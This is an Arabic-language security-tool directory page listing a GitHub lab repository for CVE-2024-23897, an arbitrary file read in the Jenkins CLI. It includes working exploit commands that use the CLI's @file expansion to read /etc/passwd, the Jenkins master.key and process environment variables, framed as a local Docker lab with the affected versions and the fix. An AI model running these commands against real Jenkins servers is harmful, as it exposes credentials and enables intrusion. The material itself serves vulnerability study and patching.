Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-23897 | Kitploit
أدوات/GitHubGitHub/dungsocool/cve-2024-23897
ماسحات الثغرات الأمنيةالاستغلالأمن الويبالتعلم والتعليممختبرات وتدريب عملي
GitHubdungsocool/cve-2024-23897

CVE-2024-23897

عرض المستودع
منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-23897 — قراءة ملف تعسفي في Jenkins CLI

بدء سريع

root@kitploit:~
# 1. Start lab
docker-compose up -d

# 2. Wait ~30s, then download CLI tool
curl -O http://localhost:8080/jnlpJars/jenkins-cli.jar

# 3. Exploit — read /etc/passwd (full file)
java -jar jenkins-cli.jar -s http://localhost:8080 -http connect-node @/etc/passwd

# 4. Read master.key (chain to RCE)
java -jar jenkins-cli.jar -s http://localhost:8080 -http connect-node @/var/jenkins_home/secrets/master.key

# 5. Read environment variables
java -jar jenkins-cli.jar -s http://localhost:8080 -http help @/proc/self/environ

التفاصيل

راجع REPORT.md للحصول على التحليل الفني الكامل (بالفيتنامية).

البندالقيمة
CVSS9.8 (حرجة)
المتأثرJenkins <= 2.441, LTS <= 2.426.2
نسخة المختبرjenkins/jenkins:2.426.2-lts
السبب الجذريargs4j expandAtFiles مفعّل في CLI من جانب الخادم
الإصلاحقم بالترقية إلى Jenkins >= 2.442 / LTS >= 2.426.3

التنظيف

root@kitploit:~
docker-compose down -v --remove-orphans
تنزيل الأداة